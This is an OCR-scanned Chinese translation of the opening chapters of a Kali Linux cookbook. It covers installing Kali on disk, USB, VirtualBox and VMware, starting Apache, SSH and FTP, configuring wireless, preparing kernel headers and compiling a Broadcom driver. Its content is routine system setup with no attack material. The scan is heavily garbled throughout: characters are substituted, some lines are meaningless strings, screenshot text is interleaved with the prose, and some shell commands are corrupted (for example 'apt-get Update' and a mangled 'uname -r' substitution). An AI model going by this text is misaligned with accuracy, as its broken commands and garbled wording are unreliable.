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第 一 装 和 启动 Kalli 


作者 : Willie L. Pritchett, David De Smet 
译 者 : 飞龙 


协 仅 : CC BY-NC-SA 4.0 


简介 


Kali Linux， 简 称 Kali， 是 用 于 安全 攻击 的 最 新 Linux 发 行 版 。 它 是 BackTrack Linux 的 后 继 者 。 
不 像 多 数 Linux 发 行 版 那样 ，Kali Linux 用 于 渗透 测试 。 渗 透 测 试 是 一 种 通过 模拟 攻击 评估 计算 
机 系统 或 网 络 安 全 性 的 方法 。 在 整 本 书 中 ， 我 们 将 会 探索 一 些 Kali Linux 所 提供 的 工具 。 


一 草 涉及 到 Kali Linux 在 不 同 场 景 下 的 的 安装 和 记 动 ， 从 插入 Kali Linux DVD 到 配置 网 络 。 


对 于 本 书 中 所 有 秘籍 ， 我 们 都 要 使 用 以 64 位 GNOME 作 为 窗口 管理 颖 (WM) 和 架构 的 Kali 
Linux (http://www.Kali.org/downloads/) 。 和 然而， 使 用 KDE 作 为 WM 的 用 法 并 不 在 这 本 书 里 涉 
及 ， 你 应 该 能 够 遵循 这 些 秘籍 ， 并 没有 多 少 问 题 。 


硬盘 的 安装 是 最 基本 的 操作 之 一 。 这 个 任务 需要 我 们 不 带 DVD 运 行 Kali 来 完成 。 


执行 这 个 秘籍 中 的 步骤 会 抹 掉 你 的 硬盘 ， 并 把 Kali 标 记 为 你 电脑 上 的 主 操 作 系统 。 
准备 
在 解释 整个 过 程 之 前 ， 需 要 满足 以 下 要 求 : 


e 为 KaliLinux 的 安装 准备 最 小 8GB 的 空闲 磁盘 空间 (然而 我 们 推荐 至 少 25GB 来 存放 这 本 书 
中 额外 的 程序 和 生成 的 词汇 表 ) 。 

e 最 小 512MB 的 内 存 。 

e 在 KaliLinux 的 下 载 页 面 下 载 Kali Linux ° 


让 我 们 开始 安装 吧 。 
ARTE WY 


1， 在 光驱 中 插入 Kali Linux Live DVD 来 开始 。 你 会 看 到 它 的 局 动 菜单 。 选 
择 Graphical install (图 形 化 安装 ) 。 


选择 语言 。 这 里 我 们 选择 English 


Live (666-pae) 


Live (606-pae failsafe) 


Live (forensic mode) 


_Install 


> L 
1 
L 
i 


BERIN UR 


Boot menu 





Eua di ainkaan uie tattle itf : Sedo re Ser EO EE 
Install with speech synthesis 


Press ENTER to boot or TAB to edit a menu entry 








Select a language 


Choose the language to be used for the installation process. 
default language for the installed system. 


Language: 


Chinese (Simplified) - 


Chinese (Traditional)  - 


Croatian 
Czech 
Danish 
Dutch 
Dzongkha 
Er glist 
Esperanto 
Estonian 
Finnish 
French 
Galician 
Georgian 


German 


fora Le 


Screenshot 


FE nih) 
Fos (3285) 
Hrvatski 
Čeština 
Dansk 


Nederlands 


I Wi 
3 


Esperanto 
Eesti 
Suomi 
Francais 
Galego 
jàtimge»n 
Deutsch 


Eb mui 


The selected language will also be the 

















Go Back | Continue 


3. 选择 你 的 位 置 。 这 里 我 们 选择 United states (美国 ) 。 





Select your location 


The selected location will be used to set your time zone and also for example to help select the system 
locale. Normally this should be the country where you live. 


This is a shortlist of locations based on the language you selected. Choose "other" if your location is not 
listed. 


Country, territory or area: 


Canada fad 
Hong Kong 

India 

Ireland 

New Zealand 
Nigeria 

Philippines 
Singapore 

South Africa 

United Kingdom 
zambia 

zimbabwe 


other 


| Screenshot | Go Back | Continue | 
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4. 选择 你 的 键盘 配置 。 这 里 我 们 选择 American English (美国 美语 ) 。 








Configure the keyboard 


Keymap to use: 


American English | 





Albanian 

Arabic 

Asturian 

Bangladesh 
Belarusian 

Bengali 

Belgian 

Bosnian 

Brazilian 

British English 
Bulgarian 

Bulgarian (phonetic layout) 
Canadian French 
Canadian Multilingual 
Catalan 


Chinese 


Creasatisan 


| Screenshot 


5. 下 面 要 完成 网 络 服务 配置 。 输 入 主机 名 称 ， 这 里 我 们 输入 Kali © 


Go Back 


=E 


L*3 


Continue | 





Configure the network 


Please enter the hostname for this system. 


The hostname is a single word that identifies your system to the network. If you don't know what your 
hostname should be, consult your network administrator. If you are setting up your own home network, 


you can make something up here. 


Hostname: 


| Screenshot 
k 


6. 下面， 我 们 需要 输入 域名 。 这 里 我 们 输入 kali.secureworks. com ° 


Go Back 


Continue 





Configure the network 


The domain name is the part of your Internet address to the right of your host name. It is often 
something that ends in .com, .net, .edu, or .org. If you are setting up a home network, you can make 
something up, but make sure you use the same domain name on all your computers. 


Domain name: 


|kali.secureworks.com| | 


Screenshot Go Back Continue 
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Set up users and passwords 


You need to set a password for 'root', the system administrative account. A malicious or unqualified user 
with root access can have disastrous results, so you should take care to choose a root password that is 


not easy to quess. It should not be a word found in dictionaries, or a word that could be easily 
associated with you. 


A good password will contain a mixture of letters, numbers and punctuation and should be changed at 
regular intervals. 


The root user should not have an empty password. If you leave this empty, the root account will be 


disabled and the system's initial user account will be given the power to become root using the "sudo" 
command. 


Note that you will not be able to see the password as you type it. 
Root password: 


D ARA5———————————MÀÀÀ 


Please enter the same root password again to verify that you have typed it correctly. 
Re-enter password to verify: 


! Screenshot | Go Back | Continue 


8 选择 你 的 时 区 ， 这 里 我 们 选择 Eastern (KFA) ° 





Configure the clock 


If the desired time zone is not listed, then please go back to the step "Choose language" and select a 
country that uses the desired time zone (the country where you live or are located). 


Select your time zone: 


Central 
Mountain 
Pacific 
Alaska 

Haw alii 
Arizona 
East Indiana 


Samoa 


| Screenshot 


9 我 们 现在 可 以 选择 磁盘 分 区 方式 。 你 会 看 到 四 个 选 可 
这 会 便于 你 分 区 。 





Partition disks 


Go Back 


Continue 


, ° 选择 Guided - use entire disk 


The installer can quide you through partitioning a disk (using different standard schemes) or, if you 
prefer, you can do it manually. With quided partitioning you will still have a chance later to review and 


customise the results. 


If you choose guided partitioning for an entire disk, you will next be asked which disk should be used. 


Partitioning method: 


Guided - use entire disk 





Guided - use entire disk and set up LVM 


Guided - use entire disk and set up encrypted LVM 
Manual 


| Screenshot 


10. 在 这 一 步 你 需要 知道 你 的 磁 意 会 被 抹 掉 ， 点 击 Continue 


| 


(继续 ) 


Go Back 


Oo 


| Continue | 
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Partition disks 


Note that all data on the disk you select will be erased, but not before you have confirmed that you 
really want to make the changes. 


Select disk to partition: 





$C513 (0,0,0) (sda) - 17.2 GB ATA VBOX HARDDISK 


| Screenshot | Go Back | Continue | 


下 面 ， 你 有 机 会 选择 三 个 分 区 方式 之 一 : 所 有 文件 放 在 一 个 分 区 、 分 离 /home ` AAT 
离 /home/user/var 和 /tmp 。 考 虑 到 Kali 用 于 渗透 测试 ， 分 区 不 需要 也 不 必要 (即使 这 对 
于 你 的 桌面 主 操作 系统 是 个 好 主意 ) 。 这 里 我 们 选择 All files in one partition (所 有 
文件 放 在 一 个 分 区 ) 并 点 击 Continue (继续 ) ° 





Partition disks 


Selected for partitioning: 
SCSI3 (0,0,0) (sda) - ATA VBOX HARDDISK: 17.2 GB 


The disk can be partitioned using one of several different schemes. If you are unsure, choose the first 
one. 


Partitioning scheme: 


All files in one partition (recommended for new users) 





Separate /home partition 


Separate /home, /usr, /var, and /tmp partitions 


| Screenshot 


| Go Back l Continue 


12. —E 1A] TY — POR? RA n Aata E ATII A ^ EE Yes 之 后 点 
ik continue (继续 ) 。 要 注意 这 是 撤销 抹 掉 你 磁盘 所 有 数据 的 最 后 机 会 。 





Partition disks 


If you continue, the changes listed below will be written to the disks. Otherwise, you will be able to make 


further changes manually. 


The partition tables of the following devices are changed: 
ScCSI3 (0,0, 0) (sda) 
The following partitions are going to be formatted: 


partition #1 of SCSI3 (0,0,0) (sda) as ext4 
partition #5 of SCSI3 (0,0,0) (sda) as swap 


brite the changes to disks? 


Screenshot 


\ 


13. 下 面 ， 你 会 被 询问 是 否 布 望 链接 到 网 络 镜像 。 网 
们 选择 Yes 之 后 点 击 continue (继续 ) 。 





Configure the package manager 


| Continue | 


名 锐 像 允 许 你 接收 到 Kali 的 更 新 。 这 里 我 


A network mirror can be used to supplement the software that is included on the CD-ROM. This may also 


make newer versions of software available. 


Use a nctwork mirror? 


| Screenshot 


14. 你 可 以 通过 点 击 continue (继续 ) 跳 过 HTTP 代 理 界 面 。 


Go Back 


Continue 





Configure the package manager 


If you need to use a HTTP proxy to access the outside world, enter the proxy information here. 
Otherwise, leave this blank. 


The proxy information should be given in the standard form of "http://[[userl[:passli&]host[:port]/". 
HTTP proxy information (blank for none): 


T 


Screenshot Go Back | Continue | 


15. 最后， 你 会 被 询问 来 安装 GRUB 局 动 器 到 主 引 导 记 录 (MBR) 中 。 选 择 ves 之 后 点 
击 Continue (继续 ) 。 





Install the GRUB boot loader on a hard disk 


It seems that this new installation is the only operating system on this computer. If so, it should be safe 
to install the GRUB boot loader to the master boot record of your first hard drive. 


Warning: If the installer failed to detect another operating system that is present on your computer, 


modifying the master boot record will make that operating system temporarily unbootable, though GRUB 
can be manually configured later to boot it. 


Install the GRUB boot loader to the master boot record? 


| Screenshot | Go Back | Continue 
b 和 一 


16， 祝 上 贺 你 现在 完成 了 Kali Linux 的 安装 ! 点击 continue ， 系 统 会 重启 并 展示 登录 界面 。 


Finish the installation 





oO Installation complete 
Installation is complete, so it is time to boot into your new system. Make sure to remove the 
installation media (CD-ROM, floppies), so that you boot into the new system rather than 
restarting the installation. 


Screenshot Go Back || Continue | 


1.2 安装 到 UU 总 或 持久 存储 器 中 


Kali Linux U 盘 能 够 持久 化 储存 系统 设置 ， 以 及 在 UU 总 中 永久 升级 和 安装 新 的 软件 包 ， 并 让 我 
们 将 个 人 定制 的 Kali Linux 随 时 带 在 身上 。 


多 亏 了 Win32 Disk Imager， 我 们 可 以 为 大 多 数 Linux 发 行 版 创建 可 启动 的 UU 和 总， 包括 持久 化 存 
储 的 Kali Linux ° 


准备 
需要 下 列 工具 和 准备 工作 以 继续 : 


e FAT324& A,8JU > XX BGB » 
e Kali Linux ISO 镜像 。 

e Win32 Disk Imager » 

e 你 可 以 从 过 里 下 载 Kali 。 


RAE JE 
让 我 们 开始 讲 Kali Linux 安 装 到 U 瘟 : 
1. d& AXE AUGE SANUS : 
4 Devices with Removable Storage (3) 


: EE DVD RW Drive (D:) x ET BD-ROM Drive (F:) 





PENDRIVE (H:) 


my” 118 GB free of 718 GE | 
2. Je sh Win32 Disk Imager ° 
3. 点击 目 录 图 表 ， 选 择 Kali Linux DVD ISO 镜像 的 位 置 


$ Win32 Disk Imager 


Image File 


Copy | [E] MD5 Hash: 


Progress 


Version: 0,9 





4. 确保 Space used to preserve files across reboots (MATER 动 中 保存 文件 的 空间 ) T 
ii 714096 ° 





Y? UMetbectin 





C) Distribution == Select Distribution == - 





Welcome to UNetbootin, the Universal Netboot Installer, Usage: 


1 Select a distribution and version to download from the list above, or manually specify files to 
load below, 
2 Select an installation ctype, and press OK to begin installing. 


(à) Diskimage SC ^] D:Walidinux-1.0.34386.iso m 


Space used to preserve files across reboots (Ubuntu only): (4096 -| MB 


Type: |USB Drive * | Drive: | | | OK | | Carcel | 
5. 选择 我 们 的 UU 盘 ， 并 点 击 OK 按 钮 来 开始 创建 可 尼 动 的 U 熏 : 
3 ow 8£53- DVDS tFAIUS > UAZ XX bootloader] » 3x 4-3 4 6 — X m Ta] 3& C 


2. 安装 完成 之 后 ， 我 们 就 可 以 重 尼 电脑 ， 从 新 创建 的 Kali Linux VA A G fk SS RE 
1 


1. Downloading Files (Done) 

2, Extracting and Copying Files (Done) 

3. Installng Bootloader (Done) 

4. Installation Complete, Reboot (Current) 


After rebooting, select the LSB boot option in the 3105 boot menu. 
Reboot now? 


| Reboot Now | | Exit 


1.3 在 VirtualBox 中 安装 


这 个 秘籍 会 引导 你 使 用 知名 的 开源 虚拟 机 软件 VirtualBox， 将 Kali Linux 安 装 在 一 个 完全 分 离 的 
访客 操作 系统 中 ， 它 在 你 的 箱 主 操作 系统 中 。 


第 一 章 安装 和 启动 Kali 


准备 
需要 满足 下 列 要 求 : 


e VirtualBox 的 最 新 版 本 〈 本 书 编写 时 为 4.2.16) © 
e Kali Linux ISO 镜像 的 副本 。 你 可 以 在 这 里 下 载 。 


TRE y JR 
iE RAT VirtualBox Y 4€ X Kali Linux : 


1. i&fq VirtualBox ， 点 击 new (新 建 ) 来 启动 虚拟 机 向 导 : 








ag Oracle VM VirtualBox Manager - ome 
| li. Machine Help i 7 
- F y | Gs Detals. E] Snapshots 
Settings Start Discard 


Welcome to VirtualBox! 


The left part of this window is a list of all virtual machines on your computer. The list is empty now because you haven't 
created any virtual machines vet. 





Qm 


In order to create a new virtual machine, press the New button in the main tool bar located 
at the top of the window. 


You can press the F1 key to get instant help, cr visit vww.virtualbox.org for the latest 
information and news. 


ae ; 
2 
E al P. 


2. Ad: Next (下 一 步 ) 按钮 ， 键 入 虚拟 机 的 名 称 ， 并 选择 OS 类 型 和 版 本 。 这 里 我 们 选择 
Linux 类 型 和 Ubuntu (64 位 ) 作为 版 本 。 点 击 Next 按钮 来 继续 : 


sé Create Virtual Machine ? WE 


Name and operating system 


Please choose a descriptive name for the new virtual machine 
and select the type of operating system you intend to install 


on it, The name you choose will be used throughout VirtualBox 
to identify this machine. 


Name: [kal Linux] | 
Type: [Linux -| 9 | 
version: [Ubuntu (64 bit) zn 








Hide Description | € Back Cancel | 


15 


第 一 章 安装 和 启动 Kali 


3， 选 择 分 配给 虚拟 机 的 基本 内 存 (RAM) 的 总 数 。 我 们 打算 使 用 默认 值 ; 点 击 Next 。 
4. 为 新 的 虚拟 机 创建 新 的 虚拟 硬盘 ， 点 击 next 按钮 。 
T Create Virtual Machine ? 


Hard drive 


If you wish you can add a virtual hard drive to the new 
machine. You can either create a new hard drive file or select 
one from the list or from another location using the folder 
icon. 


If you need a more complex storage set-up you can skip this 
step and make the changes to the machine settings once the 
machine is created. 

The recommended size of the hard drive is 8.00 GB. 

(€^ Do not add a virtual hard drive 


(* Create a virtual hard drive now 


(^ Use an existing virtual hard drive file 


[Empty -] 


5 一 个 新 的 向 导 窗 口 将 会 打开 ， 保 留 默 认 的 VDI 文 件 类 型 ， 因 为 我 们 并 不 需要 使 用 其 它 的 虚 
拟 机 软件 。 





6， 我 们 会 保留 默认 选项 作为 虚拟 机 磁盘 存储 的 详情 。 点 击 Next 来 继续 : 


T. 设置 虚拟 机 磁盘 文件 类 型 和 大 小 : 


16 





~ I ee -] gpa 

He = ALU jJ 2J A OI | 

D A As A3 €J N eri 
rE | AM /已 ACCA TE 


Create Virtual Hard Drive 





File location and size 


Please type the name of the new virtual hard drive file into the box below or 
dick on the folder icon to select a different folder to create the file in. 





[kal Linux Lal 


Select the size of the virtual hard drive in megabytes. This size is the limit on 
the amount of file data that a virtual machine will be able to store on the hard 


drive, 
k m [ 16|00 GE 


4,00 MB 2.00 TB 

















8. 检查 设置 是 否 正 确 ， 之 后 点 击 create (创建 ) 按钮 来 开始 虚拟 磁盘 文件 的 创建 。 
9. 我 们 将 会 返回 前 面 的 向 导 ， 带 有 虚拟 机 参数 的 概览 。 点 击 Create 以 结束 : 


» Oracle VM VirtualBox Manager foe 
| File Machine Help z - a 


sl Mes, 
r pem eee 
C3 do 3 | af? Details Snapshots 


Mew Settings Start Discard 

















四 = Kali Linux = General m Preview 

lea (7^ Powered Off 
| Name: Kali Linux 
Operating System: Ubuntu (64 bit) 





System 
Base Memory: 512MB =E B 
Boot Order: Floppy, CD/DVD-ROM, Hard Disk Kali Linux 


Acceleration: — VT-xX/AMD-V, Nested Pagirg 





Display 


Video Memory: 12 MB 
Remote Desktop Server: Disabled 





(3 Storage 


Controller: IDE 
IDE Secondary Master: [CD/DVD] Empty 
Controller: SATA 
SATA Port 0: Kali Linux. vdi (Normal, 16.00 GB) 





(gy Audio 


Host Driver: Windows DirectSound 
Controller: ICH ACSF 


[up Network ~| 


10. 新 的 虚拟 机 创建 之 后 ， 我 们 将 要 安装 Kali Linux » 


11. 在 VirtualBox 的 主 窗口 ， 高 完 KaliLinux， 之 后 点 击 settings (设置 ) 按钮 : 





prm 


Mame: 
, Operatinm 






" a ( Powered Off 





Base Mer 
Boot Ord 
Bcceleral 


12. 现在 基本 的 安装 步 又 就 完成 了 ， 我 们 需要 让 你 将 下 载 的 ISO 文 件 用 于 虚拟 光盘 。 这 会 为 你 
节省 JE 来 完成 这 个 安装 。 在 Settings 界面 中 ， 点 击 storage 《存储 
) 





| Storage 


Storage Tree 一 一 Attribu 





| " & Controler: IDE CD 
| ^ Controler: SATA Inform, 
iem ~ B Kal Linux. vdi 
ze Serial Ports 
i» USB 
= Al 
Shared Folders 
TECE” ES 
i 
13. 下 一 步 ， 在 Storage Tree (存储 器 树 形 图 ) TO’ AR Empty (Z) 磁盘 图 标 ， 它 


在 IDE Controller (IDE4Z 9] 2$) 的 下 面 。 这 户 选 择 我 们 的 虚拟 CD/DVD ROMJR zb S o 
在 屏幕 的 最 右边 ， 在 attributes 底下 ， 点 击 光 盘 图 表 。 在 上 面 弹出 的 菜单 上 选择 你 

的 Choose a virtual CD/DVD disc file. (Kali Linux ISO CD/DVD ž & x: tF) 选项 ， 并 
找到 你 的 ISO 。 一 旦 你 完成 了 这 些 步 又 ， 点 击 OK 按钮 。 


X 










K 3li l NUX - Sel ti nas m 
General | Storage | 








itt 
storage Tee —————— — — — —— Attributes — — — — — — — — — — — — 
1 [UI Displa 
: ji Q9 Controller: IDE CD/DVD Drive: [iE Secondary Master "| a | 
o storage : P ES 
p er [ Live CD/DVD Choose a virtual CD/DVD disk file... 
Audio | ; 
" a Controller: SATA Information — — — — — — — — — Host Drive 'E: 
Network Tones 
ype: 一 
i 一 图 Kali Linux. vai 3 Remove disk from virtual drive 
CB. Serial Ports Size: 一 = $ 
i» USB Location: 一 
Attached To: 一 


Shared Folders 


30d o 


Select a setüngs category from the ist an the /eftdhand side and move the mouse over a settngs 
item fo get more information. 





14. 点击 Start (开始 ) 按钮 ， 之 后 点 击 里 面 的 新 窗口 来 进行 安装 。 安 装 步 骤 在 1.1 节 中 已 经 包 
46 J ° 


z% VirtualBox 扩展 包 也 允许 我 们 通过 添加 USB2.0 (EHCI) ` VirtualBox RDP 和 
Intel PXE boot ROM 的 支持 ， 来 扩展 虚拟 机 的 功能 。 

1.4 安装 VMware Tools 

这 个 秘籍 中 ， 我 们 会 展示 如 何 使 用 VMware Tools 将 Kali Linux 安 装 在 虚拟 机 中 。 

准备 

需要 满足 下 列 要 求 : 


e 已 经 安装 好 的 Kali Linux VMware 虚拟 机 。 
e 网 络 连接 。 


操作 步骤 
让 我 们 开始 将 Kali Linux 安装 到 VMware 上 : 


打开 你 的 虚拟 机 的 访客 操作 系统 并 连接 到 互联 网 ， 之 后 打开 Terminal (终端 ) 窗口 ， 并 
键入 下 列 命令 来 准备 核心 资源 : 


prepare-kernel-sources 


这 些 命 令 假 设 你 使 用 Linux 或 者 Mac OS。 你 不 需要 在 Windows 下 执行 它们 。 
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2. ÆVMware Workstaion 的 菜单 栏 上 ， 访 问 vm | Install VMware Tools.. 


VM | Tabs Help 
(0 Power + 


Removable Devices b 


Pause Ctrl- Shift- P 


Send Ctrl- Alt- Del 
Grab Input Ctri- G 


KS Snapshot 4 
Capture Screen Ctri- Alt- PrtScn 


Capture Movie... 


ZU Manage + 


Install VMware Tools... 


D Settings... Ctrl+D 


3. 将 VMware Tools 安 装 工具 复制 到 临时 目录 下 ， 之 后 将 当前 位 置 改 为 目标 目录 : 

cp /media/VMware\ Tools/VMwareTools-8.8.2-590212.tar.gz /tmp/; cd /tmp 

根据 你 的 VMware Tools 来 替换 文件 名 : VMwareTools-<version>-<build>.tar.gz ° 
4. 使 用 以 下 命令 解压 并 安装 : 

tar zxpf VMwareTools-8.8.2-590212.tar.gz 
5. 进入 VMware Tools 的 目录 中 ， 之 后 运行 安装 工具 : 


cd vmware-tools-distrib/ 
./vmware-install.pl 


6， 按 下 回 车 键 来 接受 每 个 配置 询问 的 默认 值 ; vmware-config-tools.pl 脚本 同上 。 
T. 了 最 后 重 司 系统， 工作 就 完成 了 。 
工作 原理 


在 第 一 步 中 ， 我 们 准备 好 了 核心 资源 。 之 后 ， 我 们 向 访客 操作 系统 插入 了 虚拟 的 VMware 
Tools CD 。 接 着 ， 我 们 创建 了 挂 载 点 ， 并 挂 载 虚 拟 CD。 我 们 在 临时 目录 中 复制 并 解压 了 安装 
工具 。 最 后 我 们 保留 默认 配置 来 运行 安装 工具 。 


1.5 修复 启动 画面 


我 们 首次 启动 新 安装 的 Kali Linux 系 统 时 ， 会 注意 到 启动 画面 消失 了 。 为 了 手动 修复 它 ， 我 们 
需要 解压 Initrd ， 修 改 它 ， Tu E o IBA ce» A — Aih Mati Aharoni (也 称 
A“muts” > Kali Linux 的 创造 者 ) 编写 的 自动 化 bash 脚 本 使 这 件 事变 得 容易 。 


TETTE JE 
键入 下 列 命令 并 且 按 下 回 车 键 来 修复 消失 的 启动 画面 


fix-splash 


1.6 启动 网 络 服 务 


Kali Linux 自 带 了 多 种 网 络 服 务 ， 它 们 在 多 种 情况 下 可 能 很 实用 ， 并 且 默 认 是 禁用 的 。 这 个 秘 
籍 中 ， 我 们 会 涉及 到 通过 多 种 方法 设置 和 局 动 每 个 服务 的 步骤 。 


准备 
需要 满足 下 列 要求 以 继续 : 


e 带 有 有 效 IP 地 址 的 网 络 连接 。 


HR VE y TK 
让 我 们 开始 司 动 默认 服务 : 


1， 司 动 Apache 服 务 紧 : 


service apache2 start 


我 们 可 以 通过 浏览 本 地 地 址 来 验证 服务 器 是 否 打 开 。 


2. 为 了 局 动 SSH 服 务 ， 首 次 需要 生成 SSH 窗 钥 : 
sshd-generate 
3. È ASSHRFSE : 


service ssh start 


4. 使 用 netstat 命令 来 验证 服务 器 是 否 开 尼 并 正在 监听 : 


netstat -tpan | grep 22 
5. J EFTPAR AS: 
service pure-ftpd start 
6， 使 用 下 列 命令 来 验证 FTP 服 务 器 : 


netstat -ant | grep 21 


你 也 可 以 使 用 ps-ef | grep 21 命令 。 


7. 使 用 下 列 命 令 来 停止 服务 : 
service <servicename> stop 
其 中 <servicename> 代表 我 们 希望 停止 的 网 络 服务 ， 例 如 : 
service apache2 stop 


8. 使 用 下 列 命令 来 在 开机 时 启用 服务 : 


update-rc.d -f <servicename> defaults 


其 中 <servicename> 代表 打算 启动 的 网 络 服 务 ， 例 如 : 


update-rc.d -f ssh defaults 


你 也 可 以 在 KaliLinux 中 通过 services (服务 ) 菜单 来 完成 它 。 从 start (开始 ) 


RBI > HIP) Kali Linux | Services ° 


1.7 设置 无 线 网 络 


最 后 ， 我 们 来 到 了 这 一 草 的 最 后 一 个 秘籍 。 这 个 秘籍 中 ， 我 们 会 了 解 在 安全 状态 下 的 无 线 网 
络 连 接 步 又 ， 通 过 Wicd Network Manager 和 提供 加 均 的 细节 。 无 线 网 络 的 设置 允许 我 们 以 无 
线 方式 使 用 Kali Linux。 在 上 趴 实 的 、 人 合乎 道德 的 渗透 测试 中 ， 我 们 可 以 不 依赖 于 网 线 而 自由 地 
使 用 所 有 第 规 桌 面 。 


操作 步骤 


第 一 章 安装 和 局 动 Kali 


让 我 们 开始 设置 无 线 网 络 : 


1， 从 桌面 局 动 网 络 管理 器 ， 通 过 点 击 Applications (应 用 ) 菜单 并 且 访 


l=] Internet | Wicd Network Manager ， 或 者 在 终端 窗口 中 键入 下 列 命令 : 


wicd-gtk --no-tray 


2. Wicd Network Manager 会 打开 ， 并 带 有 可 用 网 络 的 列表 : 





Choose from the networks below: 


GetAway 64% WPA Channel 11 
(| Automatically connect to this network 


Not connected 


3. AÈ Properties (属性 ) 按钮 来 设 定 网 络 细 节 。 完 成 之 后 点 击 OK。 
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4. RH’ Ak connect (连接 ) 按钮 ， 就 完成 了 。 


工作 原理 


这 个 秘籍 中 ， 我 们 总 结 了 无 线 网 络 的 设置 方式 。 这 个 秘籍 以 启动 网 络 管理 器 ， 和 连接 到 我 们 
的 路 由 器 作为 开始 。 
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A — ES D m a 
"—3x 定制 Kali Linux 
作者 : Willie L. Pritchett, David De Smet 
译 者 : 飞龙 

协议 : CC BY-NC-SA 4.0 


这 一 章 会 向 你 介绍 Kali 的 定制 ， 便 于 你 更 好 地 利用 它 。 我 们 会 涉及 到 ATIl 和 美 伟 达 GPU 技 术 的 
安装 和 配置 ， 以 及 后 面 草 节 所 需 的 额外 工具 。 基 于 ATIl 和 买 伟 达 GPU 的 显卡 允许 我 们 使 用 它们 
的 图 像 处 理 单元 (GPU) 来 执行 与 CPU 截然 不 同 的 操作 。 我 们 会 以 ProxyChains 的 安装 和 数 

字 信 息 的 加 蜜 来 结束 这 一 章 。 


2.1 准备 内 核 头 文件 


有 时 我 们 需要 使 用 所 需 的 内 核 头 文件 来 编译 代码 。 内 核 头 文件 是 Linux 内 核 的 源 文 件 。 这 个 秘 
籍 中 ， 我 们 会 解释 准备 内 核 头 文件 所 需 的 步骤 ， 便 于 以 后 使 用 。 


准备 


操作 步骤 
让 我 们 开始 准备 内 核 头 文件 : 


1， 我 们 首先 通过 执行 下 列 命令 升级 发 行 版 作为 开始 : 


apt-get Update 


root@kali:~# apt-get update 
it http://security.kali.org kali/updates Release.gpg 
Jet : http://http.kali.org kali Release.gpg [836 B] 
it http://security.kali.org kali/updates Release 
:2 http://http.kali.org kali Release [21.1 kB] 
it http://security.kali.org kali/updates/main 1386 Packages 
it http://security.kali.org kali/updates/contrib i386 Packages 
et:i3s http://http.kali.org kali/main Sources [7,502 kB] 
http://security.kali.org kali/updates/contrib Translation-en US 
http://security.kall.org Kali/updates/contrib Translation-en 
http://security.kali.org kali/updates/main Translation-en_US 
http://security.kali.org kali/updates/main Translation-en 
http://security.kali.org kali/updates/non-free Translat-on-en US 
http://security.kali.org kali/updates/non-free Iranslat-on-en 
http://http.kalil.org Kkali/contrib Translation-en US 
http://http.kali.org kali/contrib Iranslation-en 
http://http.kali.org kali/main Translation-en, US 
http://http.kali.org kali/main Jranslation-en 
http://http.kali.org kati/nen-free Franstation-em US 
‘Ign http://http.kali.org kali/non-free Translation-en 





2. 下面， 我们 需要 再 次 使 用 apt-get 来 准备 内 核 头 文件 ， 执 行 下 列 命 令 : 


apt-get install linux-headers - “uname -r` 


root@kali:-# apt-get install linux-headers-'uname -r` 
Reading package Lists... Done 
Building dependency tree 
Reading state information... Done 
The following extra packages will be installed: 
Linux -headers-3./-trunk-common Linux-kbuild-3./ 


The following NEW packages will be installed: 
Linux -headers-3./-trunk-686-pae Linux-headers-3./-trunk-common 
linux-kbuild-3./ 
日 upgraded, 3 newly installed, @ to remove and ERR Re upcraded. 
Need to get 4,648 kB of archives. 
After this operation, 29.8 MB of additional disk space will be used. 
Do you want to continue [Y/n]? 





3. 复制 下 列 目 录 以 及 其 中 的 全 部 内 容 : 


cd /usr/src/linux 
cp -rf include/generated/* include/linux/ 


4. 我 们 现在 已 准备 好 编译 需要 内 核 头 文件 的 代码 。 


2.2 安装 Broadcom 了 驱动 


在 这 个 秘籍 中 ， 我 们 将 要 安装 Broadcom 官方 的 Linux 混 合 无 线 驱 动 。 使 用 Broadcom 无 线 
USB 适 配器 可 以 让 我 们 在 Kali 上 连接 我 们 的 无 线 USB 接 入 点 。 对 于 这 本 书 的 其 余 秘籍 ， 我 们 假 
it Broadcom 无 线 驱 动 已 经 安装 。 


tRVE 7 TK 
让 我 们 开始 安装 Broadcom 了 驱动: 


1. 打开 终端 窗口 ， 从 http://www.broadcom.com/support/802.11/linux_sta.php 下 载 合适 的 
Broadcom 驱动 : 


cd /tmp/ 
wget http://www.broadcom.com/docs/linux sta/hybrid-portsrc x86 64-v5 100 82 112.t 
ar.gz 


:-/usr/bin# cd /tmp 
:/tmp£ wget http://www.broadcom.com/docs/linux sta/hybrid-portsrc x86 64-v5 100 82 112.tar.gz 
- -2013-06-05 22:42:17-- http://www.broadcom.com/docs/linux sta/hybrid-portsrc x86 64-v5 100 82 112.tar.gz 
Resolving www.broadcom.com (www.broadcom.com)... 63.251.216.155 
Connecting to www.broadcom.com (www.broadcom.com)|63.251.216.155|:80... connected. 
HTTP request sent, awaiting response... 200 OK 
Length: 1175410 (1.1M) [application/x-gzip] 
Saving to: “hybrid-portsrc x86 64-v5 100 82 112.tar.gz' 


1,175,410 778K/s | in 1.5s 


2013-06-05 22:42:19 (778 KB/s) - “hybrid-portsrc_ x86 64-v5 100 82 112.tar.gz' saved [1175410/1175410] 


: /tmp# fl 





2. 使 用 下 列 命令 解压 下 载 的 驱动 : 


mkdir broadcom 
tar xvfz hybrid-portsrc_x86_64-v5_100_82_112.tar.gz -C /tmp/ broadcom 


3. 修改 wl cfg80211.c 文件 ， 由 于 5.100.82.112 版 本 中 有 个 bug， 会 阻止 小 于 2.6.39 内 核 版 
本 上 的 编译 : 


vim /tmp/broadcom/src/wl/sys/wl_cfg80211.c 


M £c 4X AG PE 851814417 : 


4if LINUX VERSION CODE > KERNEL VERSION(2, 6, 39) 


将 其 改 为 : 


4if LINUX VERSION CODE >= KERNEL VERSION(2, 6, 39) 


并 保存 修改 。 


4， 编 译 代码 : 


make clean 
make 
make install 


5. 更 新 依赖 : 
depmod -a 

6. 通过 下 列 命令 找到 加 载 的 模块 : 
lsmod | grep b43\|ssb\|bcma 


7. 通过 执行 下 列 命 令 移 除 发 现 的 模块 : 
rmmod <module>b43 
其 中 «module» 应 为 b43 ^ ssb 或 bcma ° 
8， 将 模块 加 入 黑 名 单 ， 防 止 它们 在 系统 启动 中 加 载 : 
echo "blacklist <module>" >> /etc/modprobe.d/blacklist.conf 
其 中 <module> 应 为 b43 、 ssb b wl ? 
9. 最后， 将 新 模块 添加 到 Linux 内 核 中 ， 来 使 它 成 为 启动 进程 的 一 部 分 : 


modprobe wl 


2.3 安装 和 配置 ATIl 显 卡 驱 动 


这 个 秘籍 中 ， 我 们 会 详细 讲解 ATI 显 卡 驱 动 的 安装 和 配置 ， 在 此 之 前 需要 AMD Accelerated 
